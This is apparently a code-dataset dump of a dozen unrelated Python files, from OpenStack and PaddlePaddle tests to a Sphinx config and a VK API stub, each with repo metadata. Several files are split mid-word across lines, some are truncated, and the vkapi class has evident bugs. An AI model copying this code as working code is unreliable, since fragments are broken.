user_id=self.fake_action_0. get('user_id'), action_id=action_id) self.assertIsNotNone(result) self.assertEqual(result, action_id) result = self.dbapi.get_action(project_id=self.fake_project_id, user_id=self.fake_action_0. get('user_id'), action_id=action_id) self.assertEqual(len(result), 0) def test_add_and_update_action(self): action_doc = copy.deepcopy(self.fake_action_0) action_id = self.dbapi.add_action(user_id=self.fake_action_0. get('user_id'), doc=action_doc, project_id=self.fake_project_id) self.assertIsNotNone(action_id) patch_doc = copy.deepcopy(self.fake_action_2) result = self.dbapi.update_action(project_id=self.fake_project_id, user_id=self.fake_action_2. get('user_id'), patch_doc=patch_doc, action_id=action_id) self.assertIsNotNone(result) self.assertEqual(result, action_id) result = self.dbapi.get_action(project_id=self.fake_project_id, user_id=self.fake_action_2. get('user_id'), action_id=action_id) self.assertEqual(result.get('max_retries'), self.fake_action_2.get('max_retries')) self.assertEqual(result.get('max_retries_interval'), self.fake_action_2.get('max_retries_interval')) freezer_action = result.get('freezer_action') self.assertEqual(freezer_action.get('action'), self.freezer_action_2.get('action')) def test_add_and_replace_action(self): action_doc = copy.deepcopy(self.fake_action_0) action_id = self.dbapi.add_action(user_id=self.fake_action_0. get('user_id'), doc=action_doc, project_id=self.fake_project_id) self.assertIsNotNone(action_id) patch_doc = copy.deepcopy(self.fake_action_2) result = self.dbapi.replace_action(project_id=self.fake_project_id, user_id=self.fake_action_2. get('user_id'), doc=patch_doc, action_id=action_id) self.assertIsNotNone(result) self.assertEqual(result, action_id) result = self.dbapi.get_action(project_id=self.fake_project_id, user_id=self.fake_action_2. get('user_id'), action_id=action_id) self.assertEqual(result.get('max_retries'), self.fake_action_2.get('max_retries')) self.assertEqual(result.get('max_retries_interval'), self.fake_action_2.get('max_retries_interval')) freezer_action = result.get('freezer_action') self.assertEqual(freezer_action.get('action'), self.freezer_action_2.get('action')) patch_doc1 = copy.deepcopy(self.fake_action_0) result = self.dbapi.replace_action(project_id=self.fake_project_id, user_id=self.fake_action_2. get('user_id'), doc=patch_doc1, action_id=self.fake_action_id)
self.assertIsNotNone(result) result = self.dbapi.get_action(project_id=self.fake_project_id, user_id=self.fake_action_2. get('user_id'), action_id=self.fake_action_id) self.assertEqual(result.get('action_id'), self.fake_action_id) def tes
t_add_and_search_action(self): count = 0 actionids = [] while(count < 20): doc = cop
lkhomenk/integration_tests
cfme/infrastructure/provider/rhevm.py
Python
gpl-2.0
6,107
0.003111
import attr from widgetastic.widget import View, Text from widgetastic_patternfly import Tab, Input, BootstrapSwitch, Button from wrapanapi.rhevm import RHEVMSystem from cfme.common.candu_views import VMUtilizationView from cfme.common.provider import CANDUEndpoint, DefaultEndpoint, DefaultEndpointForm from cfme.common.provider_views import BeforeFillMixin from cfme.exceptions import ItemNotFound from cfme.services.catalogs.catalog_items import RHVCatalogItem from cfme.utils import version from widg
etastic_manageiq import LineChart from . import InfraProvider class RHEVMEndp
oint(DefaultEndpoint): @property def view_value_mapping(self): tls_since_version = '5.8.0.8' return {'hostname': self.hostname, 'api_port': getattr(self, 'api_port', None), 'verify_tls': version.pick({ version.LOWEST: None, tls_since_version: getattr(self, 'verify_tls', None)}), 'ca_certs': version.pick({ version.LOWEST: None, tls_since_version: getattr(self, 'ca_certs', None)}) } class RHEVMEndpointForm(View): @View.nested class default(Tab, DefaultEndpointForm, BeforeFillMixin): # NOQA TAB_NAME = 'Default' api_port = Input('default_api_port') verify_tls = BootstrapSwitch(id='default_tls_verify') ca_certs = Input('default_tls_ca_certs') @View.nested class candu(Tab, BeforeFillMixin): # NOQA TAB_NAME = 'C & U Database' hostname = Input('metrics_hostname') api_port = Input('metrics_api_port') database_name = Input('metrics_database_name') username = Input('metrics_userid') password = Input('metrics_password') confirm_password = Input('metrics_verify') change_password = Text(locator='.//a[normalize-space(.)="Change stored password"]') validate = Button('Validate') class RHEVMVMUtilizationView(VMUtilizationView): """A VM Utilization view for rhevm providers""" vm_cpu = LineChart(id='miq_chart_parent_candu_0') vm_memory = LineChart(id='miq_chart_parent_candu_1') vm_disk = LineChart(id='miq_chart_parent_candu_2') vm_network = LineChart(id='miq_chart_parent_candu_3') @attr.s(hash=False) class RHEVMProvider(InfraProvider): catalog_item_type = RHVCatalogItem vm_utilization_view = RHEVMVMUtilizationView type_name = "rhevm" mgmt_class = RHEVMSystem db_types = ["Redhat::InfraManager"] endpoints_form = RHEVMEndpointForm discover_dict = {"rhevm": True} settings_key = 'ems_redhat' # xpath locators for elements, to be used by selenium _console_connection_status_element = '//*[@id="connection-status"]|//*[@id="message-div"]' _canvas_element = '(//*[@id="remote-console"]/canvas|//*[@id="spice-screen"]/canvas)' _ctrl_alt_del_xpath = '//*[@id="ctrlaltdel"]' _fullscreen_xpath = '//*[@id="fullscreen"]' bad_credentials_error_msg = "Credential validation was not successful" ems_events = [ ('vm_create', {'event_type': 'USER_ADD_VM_FINISHED_SUCCESS', 'vm_or_template_id': None}), ('vm_stop', {'event_type': 'USER_STOP_VM', 'vm_or_template_id': None}), ('vm_start', {'event_type': 'USER_RUN_VM', 'vm_or_template_id': None}), ('vm_delete', {'event_type': 'USER_REMOVE_VM_FINISHED', 'vm_or_template_id': None}) ] @property def view_value_mapping(self): return { 'name': self.name, 'prov_type': 'Red Hat Virtualization' } def deployment_helper(self, deploy_args): """ Used in utils.virtual_machines """ if 'default_cluster' not in deploy_args: return {'cluster': self.data['default_cluster']} return {} @classmethod def from_config(cls, prov_config, prov_key): endpoints = {} for endp in prov_config['endpoints']: for expected_endpoint in (RHEVMEndpoint, CANDUEndpoint): if expected_endpoint.name == endp: endpoints[endp] = expected_endpoint(**prov_config['endpoints'][endp]) if prov_config.get('discovery_range'): start_ip = prov_config['discovery_range']['start'] end_ip = prov_config['discovery_range']['end'] else: start_ip = end_ip = prov_config.get('ipaddress') return cls.appliance.collections.infra_providers.instantiate( prov_class=cls, name=prov_config['name'], endpoints=endpoints, zone=prov_config.get('server_zone', 'default'), key=prov_key, start_ip=start_ip, end_ip=end_ip) # Following methods will only work if the remote console window is open # and if selenium focused on it. These will not work if the selenium is # focused on Appliance window. def get_console_connection_status(self): try: return self.appliance.browser.widgetastic.selenium.find_element_by_xpath( self._console_connection_status_element).text except: raise ItemNotFound("Element not found on screen, is current focus on console window?") def get_remote_console_canvas(self): try: return self.appliance.browser.widgetastic.selenium.find_element_by_xpath( self._canvas_element) except: raise ItemNotFound("Element not found on screen, is current focus on console window?") def get_console_ctrl_alt_del_btn(self): try: return self.appliance.browser.widgetastic.selenium.find_element_by_xpath( self._ctrl_alt_del_xpath) except: raise ItemNotFound("Element not found on screen, is current focus on console window?") def get_console_fullscreen_btn(self): try: return self.appliance.browser.widgetastic.selenium.find_element_by_xpath( self._fullscreen_xpath) except: raise ItemNotFound("Element not found on screen, is current focus on console window?")
EndPointCorp/lg_ros_nodes
lg_keyboard/setup.py
Python
apache-2.0
309
0
#!/usr/bin/env python3 from dis
tutils.core import setup from catkin_pkg.python_setup import generate_distutils_setup d = generate_distutils_setup( packages=['lg_keyboard'], package_dir={'': 'src'}, scripts=[], requires=[] ) setu
p(**d) # vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
p5a0u9l/clamm
doc/conf.py
Python
mit
4,816
0.000208
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # # clamm documentation build configuration file, created by # sphinx-quickstart on Thu Mar 2 20:47:20 2017. # # This file is execfile()d with the current directory set to its # containing dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. # import os import sys sys.path.insert(0, os.path.abspath('../clamm')) # -- General configuration ------------------------------------------------ # If your documentation needs a minimal Sphinx version, state it here. # # needs_sphinx = '1.0' # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom # ones. extensions = [ 'sphinx.ext.autodoc', 'sphinx.ext.coverage', 'sphinx.ext.napoleon'] napoleon_numpy_docstring = True # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # The suffix(es) of source filenames. # You can specify multiple suffix as a list of string: # # source_suffix = ['.rst', '.md'] source_suffix = '.rst' # The master toctree document. master_doc = 'index' # General information about the project. project = 'clamm' copyright = '2017, Paul Adams' author = 'Paul Adams' # The version info for the project you're documenting, acts as replacement for # |version| and |release|, also used in various other places throughout the # built documents. # # The short X.Y version. version = '0.1' # The full version, including alpha/beta/rc tags. release = '0.1' # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. # # This is also used if you do content translation via gettext catalogs. # Usually you set "language" from the command line for these cases. language = None # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. # This patterns also effect to html_static_path and html_extra_path exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store'] # The name of
the Pygments (syntax highlighting) style to use. pygments_style = 'sphinx' # If true, `todo` and `todoList` produce output, else they produce nothing. todo_include_todos = False # -- Options for HTML output ---------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. # html_theme = 'alabaster' # Theme options are theme-specific and cus
tomize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. # # html_theme_options = {} # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ['_static'] # -- Options for HTMLHelp output ------------------------------------------ # Output file base name for HTML help builder. htmlhelp_basename = 'clammdoc' # -- Options for LaTeX output --------------------------------------------- latex_elements = { # The paper size ('letterpaper' or 'a4paper'). # # 'papersize': 'letterpaper', # The font size ('10pt', '11pt' or '12pt'). # # 'pointsize': '10pt', # Additional stuff for the LaTeX preamble. # # 'preamble': '', # Latex figure (float) alignment # # 'figure_align': 'htbp', } # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, # author, documentclass [howto, manual, or own class]). latex_documents = [ (master_doc, 'clamm.tex', 'clamm Documentation', 'Paul Adams', 'manual'), ] # -- Options for manual page output --------------------------------------- # One entry per manual page. List of tuples # (source start file, name, description, authors, manual section). man_pages = [ (master_doc, 'clamm', 'clamm Documentation', [author], 1) ] # -- Options for Texinfo output ------------------------------------------- # Grouping the document tree into Texinfo files. List of tuples # (source start file, target name, title, author, # dir menu entry, description, category) texinfo_documents = [ (master_doc, 'clamm', 'clamm Documentation', author, 'clamm', 'One line description of project.', 'Miscellaneous'), ]
kuba1/qtcreator
tests/system/suite_general/tst_build_speedcrunch/test.py
Python
lgpl-2.1
3,768
0.008493
############################################################################# ## ## Copyright (C) 2015 The Qt Company Ltd. ## Contact: http://www.qt.io/licensing ## ## This file is part of Qt Creator. ## ## Commercial License Usage ## Licensees holding valid commercial Qt licenses may use this file in ## accordance with the commercial license agreement provided with the ## Software or, alternatively, in accordance with the terms contained in ## a written agreement between you and The Qt Company. For licensing terms and ## conditions see http://www.qt.io/terms-conditions. For further information ## use the contact form at http://www.qt.io/contact-us. ## ## GNU Lesser General Public License Usage ## Alternatively, this file may be used under the terms of the GNU Lesser ## General Public License version 2.1 or version 3 as published by the Free ## Software Foundation and appearing in the file LICENSE.LGPLv21 and ## LICENSE.LGPLv3 included in the packaging of this file. Please review the ## following information to ensure the GNU Lesser General Public License ## requirements will be met: https://www.gnu.org/licenses/lgpl.html and ## http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html. ## ## In addition, as a special excepti
on, The Qt Company gives you certain additional ## rights. These rights are described in The Qt Company LGPL Exception ## version 1.1, included in the file LGPL_EXCEPTION.txt in this package. ## ############################################################################# source("../../shared/qtcreator.py") import re SpeedCrunchPath = "" def buildConfigFromFancyToolButton(fancyToolButton): beginOfBu
ildConfig = "<b>Build:</b> " endOfBuildConfig = "<br/><b>Deploy:</b>" toolTipText = str(fancyToolButton.toolTip) beginIndex = toolTipText.find(beginOfBuildConfig) + len(beginOfBuildConfig) endIndex = toolTipText.find(endOfBuildConfig) return toolTipText[beginIndex:endIndex] def main(): if not neededFilePresent(SpeedCrunchPath): return startApplication("qtcreator" + SettingsPath) if not startedWithoutPluginError(): return suitableKits = Targets.DESKTOP_480_GCC if platform.system() in ('Windows', 'Microsoft'): suitableKits |= Targets.DESKTOP_480_MSVC2010 checkedTargets = openQmakeProject(SpeedCrunchPath, suitableKits) progressBarWait(30000) fancyToolButton = waitForObject(":*Qt Creator_Core::Internal::FancyToolButton") availableConfigs = iterateBuildConfigs(len(checkedTargets), "Release") if not availableConfigs: test.fatal("Haven't found a suitable Qt version (need Release build) - leaving without building.") for kit, config in availableConfigs: selectBuildConfig(len(checkedTargets), kit, config) buildConfig = buildConfigFromFancyToolButton(fancyToolButton) if buildConfig != config: test.fatal("Build configuration %s is selected instead of %s" % (buildConfig, config)) continue test.log("Testing build configuration: " + config) if not JIRA.isBugStillOpen(13700): invokeMenuItem("Build", "Run qmake") waitForCompile() invokeMenuItem("Build", "Rebuild All") waitForCompile(300000) checkCompile() checkLastBuild() # Add a new run configuration invokeMenuItem("File", "Exit") def init(): global SpeedCrunchPath SpeedCrunchPath = os.path.join(srcPath, "creator-test-data", "speedcrunch", "src", "speedcrunch.pro") cleanup() def cleanup(): # Make sure the .user files are gone cleanUpUserFiles(SpeedCrunchPath) for dir in glob.glob(os.path.join(srcPath, "creator-test-data", "speedcrunch", "speedcrunch-build-*")): deleteDirIfExists(dir)
Pyangs/ShiPanE-Python-SDK
examples/joinquant/simple_strategy.py
Python
mit
911
0.001473
import shipane_sdk # 初始化函数,设定要操作的股票、基准等等 def initialize(context): # 定义一个全局变量, 保存要操作的股票 # 000001(股票:平安银行) g.security = '000001.XSHE' # 设定沪深300作为基准 set_benchmark('000300.XSHG') def process_initialize(context): # 创建 StrategyManager 对象 # 参数为配置文件中的 manager id
g.__manager = shipane_sdk.JoinQuantStrategyManagerFactory(context).create('manager-1') # 每个单位时间(如果按天回测,则每天调用一次,如果按分钟,则每分钟调用一次)调用一次 def handle_data(context, data): # 保存 order 对象 order_ = order(g.security, 100) # 实盘易依据
聚宽的 order 对象下单 g.__manager.execute(order_) order_ = order(g.security, -100) g.__manager.execute(order_) # 撤单 g.__manager.cancel(order_)
javaos74/neutron
neutron/tests/unit/api/rpc/handlers/test_resources_rpc.py
Python
apache-2.0
8,869
0.000338
# Copyright (c) 2015 Mellanox Technologies, Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. import mock from oslo_versionedobjects import base as obj_base from oslo_versionedobjects import fields as obj_fields import testtools from neutron.api.rpc.callbacks import resources from neutron.api.rpc.handlers import resources_rpc from neutron.common import topics from neutron import context from neutron.objects import base as objects_base from neutron.tests import base def _create_test_dict(): return {'id': 'uuid', 'field': 'foo'} def _create_test_resource(context=None): resource_dict = _create_test_dict() resource = FakeResource(context, **resource_dict) resource.obj_reset_changes() return resource @obj_base.VersionedObjectRegistry.register class FakeResource(objects_base.NeutronObject): fields = { 'id': obj_fields.UUIDField(), 'field': obj_fields.StringField() } @classmethod def get_objects(cls, context, **kwargs): return list() class ResourcesRpcBaseTestCase(base.BaseTestCase): def setUp(self): super(ResourcesRpcBaseTestCase, self).setUp() self.context = context.get_admin_context() class _ValidateResourceTypeTestCase(base.BaseTestCase): def setUp(self): super(_ValidateResourceTypeTestCase, s
elf).setUp() self.is_valid_mock = mock.patch.object( resources_rpc.resources, 'is_valid_resource_type').start()
def test_valid_type(self): self.is_valid_mock.return_value = True resources_rpc._validate_resource_type('foo') def test_invalid_type(self): self.is_valid_mock.return_value = False with testtools.ExpectedException( resources_rpc.InvalidResourceTypeClass): resources_rpc._validate_resource_type('foo') class _ResourceTypeVersionedTopicTestCase(base.BaseTestCase): @mock.patch.object(resources_rpc, '_validate_resource_type') def test_resource_type_versioned_topic(self, validate_mock): obj_name = FakeResource.obj_name() expected = topics.RESOURCE_TOPIC_PATTERN % { 'resource_type': 'FakeResource', 'version': '1.0'} with mock.patch.object(resources_rpc.resources, 'get_resource_cls', return_value=FakeResource): observed = resources_rpc.resource_type_versioned_topic(obj_name) self.assertEqual(expected, observed) class ResourcesPullRpcApiTestCase(ResourcesRpcBaseTestCase): def setUp(self): super(ResourcesPullRpcApiTestCase, self).setUp() mock.patch.object(resources_rpc, '_validate_resource_type').start() mock.patch('neutron.api.rpc.callbacks.resources.get_resource_cls', return_value=FakeResource).start() self.rpc = resources_rpc.ResourcesPullRpcApi() mock.patch.object(self.rpc, 'client').start() self.cctxt_mock = self.rpc.client.prepare.return_value def test_is_singleton(self): self.assertIs(self.rpc, resources_rpc.ResourcesPullRpcApi()) def test_pull(self): expected_obj = _create_test_resource(self.context) resource_id = expected_obj.id self.cctxt_mock.call.return_value = expected_obj.obj_to_primitive() result = self.rpc.pull( self.context, FakeResource.obj_name(), resource_id) self.cctxt_mock.call.assert_called_once_with( self.context, 'pull', resource_type='FakeResource', version=FakeResource.VERSION, resource_id=resource_id) self.assertEqual(expected_obj, result) def test_pull_resource_not_found(self): resource_dict = _create_test_dict() resource_id = resource_dict['id'] self.cctxt_mock.call.return_value = None with testtools.ExpectedException(resources_rpc.ResourceNotFound): self.rpc.pull(self.context, FakeResource.obj_name(), resource_id) class ResourcesPullRpcCallbackTestCase(ResourcesRpcBaseTestCase): def setUp(self): super(ResourcesPullRpcCallbackTestCase, self).setUp() self.callbacks = resources_rpc.ResourcesPullRpcCallback() self.resource_obj = _create_test_resource(self.context) def test_pull(self): resource_dict = _create_test_dict() with mock.patch.object( resources_rpc.prod_registry, 'pull', return_value=self.resource_obj) as registry_mock: primitive = self.callbacks.pull( self.context, resource_type=FakeResource.obj_name(), version=FakeResource.VERSION, resource_id=self.resource_obj.id) registry_mock.assert_called_once_with( 'FakeResource', self.resource_obj.id, context=self.context) self.assertEqual(resource_dict, primitive['versioned_object.data']) self.assertEqual(self.resource_obj.obj_to_primitive(), primitive) @mock.patch.object(FakeResource, 'obj_to_primitive') def test_pull_no_backport_for_latest_version(self, to_prim_mock): with mock.patch.object(resources_rpc.prod_registry, 'pull', return_value=self.resource_obj): self.callbacks.pull( self.context, resource_type=FakeResource.obj_name(), version=FakeResource.VERSION, resource_id=self.resource_obj.id) to_prim_mock.assert_called_with(target_version=None) @mock.patch.object(FakeResource, 'obj_to_primitive') def test_pull_backports_to_older_version(self, to_prim_mock): with mock.patch.object(resources_rpc.prod_registry, 'pull', return_value=self.resource_obj): self.callbacks.pull( self.context, resource_type=FakeResource.obj_name(), version='0.9', # less than initial version 1.0 resource_id=self.resource_obj.id) to_prim_mock.assert_called_with(target_version='0.9') class ResourcesPushRpcApiTestCase(ResourcesRpcBaseTestCase): def setUp(self): super(ResourcesPushRpcApiTestCase, self).setUp() mock.patch.object(resources_rpc.n_rpc, 'get_client').start() mock.patch.object(resources_rpc, '_validate_resource_type').start() self.rpc = resources_rpc.ResourcesPushRpcApi() self.cctxt_mock = self.rpc.client.prepare.return_value self.resource_obj = _create_test_resource(self.context) def test__prepare_object_fanout_context(self): expected_topic = topics.RESOURCE_TOPIC_PATTERN % { 'resource_type': resources.get_resource_type(self.resource_obj), 'version': self.resource_obj.VERSION} with mock.patch.object(resources_rpc.resources, 'get_resource_cls', return_value=FakeResource): observed = self.rpc._prepare_object_fanout_context( self.resource_obj) self.rpc.client.prepare.assert_called_once_with( fanout=True, topic=expected_topic) self.assertEqual(self.cctxt_mock, observed) def test_pushy(self): with mock.patch.object(resources_rpc.resources, 'get_resource_cls', return_value=FakeResource): self.rpc.push( self.context, self.resource_obj, 'TYPE') self.cctxt_mock.cast.assert_called_once_with( self.context, 'push', resource=self.resource_obj.obj_to_primitive(), event_type='TYPE') class ResourcesPushRpcCallbackTestCase(ResourcesRpcBaseTestCase): def setUp(self): super(ResourcesPushRpcCallbackTestCase, self).setUp() mock.patch.object(resource
c4goldsw/shogun
examples/undocumented/python_modular/kernel_anova_modular.py
Python
gpl-3.0
717
0.041841
#!/usr/bin/env python traindat = '../data/fm_train_real.dat' testdat = '../data/fm_test_real.dat' parameter_list = [[traindat,testdat,2,10], [traindat,testdat,5,10]] def kernel_anova_modular (train_fname=traindat,test_fname=testdat,cardinality=2, size_cache=10):
from modshogun import ANOVAKernel,RealFeatures,CSVFile feats_train=RealFeatures(CSVFile(train_fname)) feats_test=RealFeatures(CSVFile(test_fname)) kernel=ANOVAKe
rnel(feats_train, feats_train, cardinality, size_cache) km_train=kernel.get_kernel_matrix() kernel.init(feats_train, feats_test) km_test=kernel.get_kernel_matrix() return km_train, km_test, kernel if __name__=='__main__': print('ANOVA') kernel_anova_modular(*parameter_list[0])
vansjyo/Hacktoberfest-2k17
DhvanilP/sieve_of_erastothenes.py
Python
mit
457
0
from math import sqrt def main(): n = int(input("Enter n : ")) boolArr = [True for i in range(n + 1)] boolArr[0] = boolA
rr[1] = False for i in range(2, int(sqrt(n) + 1)): if boolArr[i] is True: for j in range(i * i, n + 1, i): # print(boolArr) boolArr[j] = False for i in range(2, n + 1): if boolArr[i] is True: print(i) if __name__ == '__main__': ma
in()
baidu/Paddle
python/paddle/fluid/tests/unittests/test_fake_quantize_op.py
Python
apache-2.0
5,508
0.000182
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import print_function import unittest import numpy as np from op_test import OpTest import paddle.fluid.core as core class TestFakeQuantizeOp(OpTest): def setUp(self): self.op_type = "fake_quantize_abs_max" self.attrs = {'bit_length': 8} self.inputs = {'X': np.random.random((124, 240)).astype("float32"), } scale = np.max(np.abs(self.inputs['X'])).astype("float32") self.outputs = { 'Out': np.round(self.inputs['X'] / scale * ( (1 << (self.attrs['bit_length'] - 1)) - 1)), 'OutScale': np.array(scale).astype("float32"), } def test_check_output(self): self.check_output() class TestFakeChannelWiseQuantizeOp(OpTest): def setUp(self): self.op_type = "fake_channel_wise_quantize_abs_max" self.attrs = {'bit_length': 8} self.inputs = { 'X': np.random.random((4, 3, 64, 64)).astype("float32"), } scales = [] for i in range(self.inputs['X'].shape[0]): scales.append(np.max(np.abs(self.inputs['X'][i])).astype("float32")) outputs = self.inputs['X'].copy() for i, scale in enumerate(scales): outputs[i] = np.round(outputs[i] / scale * ( (1 << (self.attrs['bit_length'] - 1)) - 1)) self.outputs = { 'Out': outputs, 'OutScale': np.array(scales).astype("float32"), } def test_check_output(self): self.check_output() class TestFakeQuantizeRangeAbsMaxOp(OpTest): def setUp(self): self.op_type = "fake_quantize_range_abs_max" self.attrs = { 'bit_length': int(5), 'window_size': int(1), 'is_test': False } x = (np.random.random((8, 16, 7, 7)) - 0.5) * 10 x = x.astype("float32") self.inputs = { 'X': x, 'Iter': np.zeros(1).astype("int64"), 'InScale': np.zeros(1).astype("float32") } scale = np.max(np.abs(self.inputs['X'])).astype("float32") out_scales = np.zeros(self.attrs['window_size']).astype("float32") out_scales[0] = scale self.outputs = { 'Out': np.round(self.inputs['X'] / scale * ( (1 << (self.attrs['bit_length'] - 1)) - 1)), 'OutScale': scale, 'OutScales': out_scales, } def test_check_output(self): self.check_output() class TestFakeQuantizeMovingOp(OpTest): def setUp(self): self.op_type = "fake_quantize_moving_average_abs_max" self.attrs = { 'bit_length': int(5), 'moving_rate': float(0.9), 'is_test': False
} accum = np.zeros(1).astype("float32") accum[0] = 1 state = np.zeros(1).astype("float32") state[0] = 1 scale = np.zeros(1).astype("float32") scale[0] = 0.001 self.inputs = { 'X': np.random.random((8, 16, 7, 7)).astype("float32"), 'InScale': scale, 'InAccum': accum, 'InState': state, } out_accum = np.zeros(1).astype("float32") out_state = np.zeros(1).
astype("float32") out_scale = np.zeros(1).astype("float32") out_accum[0] = self.attrs['moving_rate'] * accum[0] + np.max( np.abs(self.inputs['X'])).astype("float32") out_state[0] = self.attrs['moving_rate'] * state[0] + 1 out_scale = out_accum / out_state self.outputs = { 'Out': np.round(self.inputs['X'] / out_scale * ( (1 << (self.attrs['bit_length'] - 1)) - 1)), 'OutAccum': out_accum, 'OutState': out_state, 'OutScale': out_scale, } def test_check_output(self): self.check_output() class TestFakeQuantizeRangeAbsMaxOp2(OpTest): def setUp(self): self.op_type = "fake_quantize_range_abs_max" self.attrs = { 'bit_length': int(8), 'window_size': int(1), 'is_test': True } x = (np.random.random((8, 16, 7, 7)) - 0.5) * 10 x = x.astype("float32") scale = np.max(np.abs(x)).astype("float32") - 1.0 out_scales = np.zeros(self.attrs['window_size']).astype("float32") out_scales[0] = scale self.inputs = { 'X': x, 'Iter': np.zeros(1).astype("int64"), 'InScale': scale.astype("float32") } xs = np.clip(x, -scale, scale) qs = np.round(xs / scale * ((1 << (self.attrs['bit_length'] - 1)) - 1)) self.outputs = { 'Out': qs, 'OutScale': scale.astype("float32"), 'OutScales': out_scales, } def test_check_output(self): self.check_output(no_check_set=set(['OutScale', 'OutScales'])) if __name__ == "__main__": unittest.main()
enep/vkbot
vkbot/vkapi.py
Python
gpl-3.0
1,581
0.033333
# vkapi.py # # Copyright 2016 Igor Unixoid Kolonchenko <enepunixoid@gmail.com> # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to
the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, # MA 02110-1301, USA. # # import requests import sys class vkapi(object): redirect_url = '' scope = 0 '''Разрешение прав доступа''' access_token = '' client_id = """ https://oauth.vk.com/authorize? client_id=1&display=page&redirect_uri=http://example.com/callback &scope=friends&response_type=token&v=5.57
&state=123456 """ def __init__(self,_ci,_ru,_scope): self.redirect_url == _ru self.scope = _scope self.client_id = _ci def auth(login,passwd): url = "https://oauth.vk.com/authorize" params["client_id"] = self.client_id params["display"] = "mobile" params["redirecct_url"] = self.redirect_url params["scope"] = self.scope params["response_type"]="token" try: res = requests.get(url,params) except requests.
mats116/ElasticBigQuery
boilerplate/models.py
Python
lgpl-3.0
5,145
0.003304
from webapp2_extras.appengine.auth.models import User from google.appengine.ext import ndb class User(User): """ Universal user model. Can be used with App Engine's default users API, own auth or third party authentication methods (OpenID, OAuth etc). based on https://gist.github.com/kylefinley """ #: Creation date. created = ndb.DateTimeProperty(auto_now_add=True) #: Modification date. updated = ndb.DateTimeProperty(auto_now=True) #: User defined unique name, also used as key_name. # Not used by OpenID username = ndb.StringProperty() #: User Name name = ndb.StringProperty() #: User Last Name last_name = ndb.StringProperty() #: User email email = ndb.StringProperty() #: Hashed password. Only set for own authentication. # Not required because third party authentication # doesn't use password. password = ndb.StringProperty() #: User Country country = ndb.StringProperty() #: User TimeZone tz = ndb.StringProperty() #: Account activation verifies email activated = ndb.BooleanProperty(default=False) @classmethod def get_by_email(cls, email): """Returns a user object based on an email. :param email: String representing the user email. Examples: :returns: A user object. """ return cls.query(cls.email == email).get() @classmethod def create_resend_token(cls, user_id): entity = cls.token_model.create(user_id, 'resend-activation-mail') return entity.token @classmethod
def validate_resend_token(cls, user_id, token): return cls.validate_token(user_id, 'resend-activation-mail', token) @classmethod def delete_resend_token(cls, user_id, token): cls.token_model.get_key(user_id, 'resend-activation-mail', token).delete() def get_social_providers_names(self): social_user_objects = SocialUser.get_by_user(se
lf.key) result = [] # import logging for social_user_object in social_user_objects: # logging.error(social_user_object.extra_data['screen_name']) result.append(social_user_object.provider) return result def get_social_providers_info(self): providers = self.get_social_providers_names() result = {'used': [], 'unused': []} for k,v in SocialUser.PROVIDERS_INFO.items(): if k in providers: result['used'].append(v) else: result['unused'].append(v) return result class LogVisit(ndb.Model): user = ndb.KeyProperty(kind=User) uastring = ndb.StringProperty() ip = ndb.StringProperty() timestamp = ndb.StringProperty() class LogEmail(ndb.Model): sender = ndb.StringProperty( required=True) to = ndb.StringProperty( required=True) subject = ndb.StringProperty( required=True) body = ndb.TextProperty() when = ndb.DateTimeProperty() class SocialUser(ndb.Model): PROVIDERS_INFO = { # uri is for OpenID only (not OAuth) 'google': {'name': 'google', 'label': 'Google', 'uri': 'gmail.com'}, #'github': {'name': 'github', 'label': 'Github', 'uri': ''}, #'facebook': {'name': 'facebook', 'label': 'Facebook', 'uri': ''}, #'linkedin': {'name': 'linkedin', 'label': 'LinkedIn', 'uri': ''}, #'myopenid': {'name': 'myopenid', 'label': 'MyOpenid', 'uri': 'myopenid.com'}, #'twitter': {'name': 'twitter', 'label': 'Twitter', 'uri': ''}, #'yahoo': {'name': 'yahoo', 'label': 'Yahoo!', 'uri': 'yahoo.com'}, } user = ndb.KeyProperty(kind=User) provider = ndb.StringProperty() uid = ndb.StringProperty() extra_data = ndb.JsonProperty() @classmethod def get_by_user(cls, user): return cls.query(cls.user == user).fetch() @classmethod def get_by_user_and_provider(cls, user, provider): return cls.query(cls.user == user, cls.provider == provider).get() @classmethod def get_by_provider_and_uid(cls, provider, uid): return cls.query(cls.provider == provider, cls.uid == uid).get() @classmethod def check_unique_uid(cls, provider, uid): # pair (provider, uid) should be unique test_unique_provider = cls.get_by_provider_and_uid(provider, 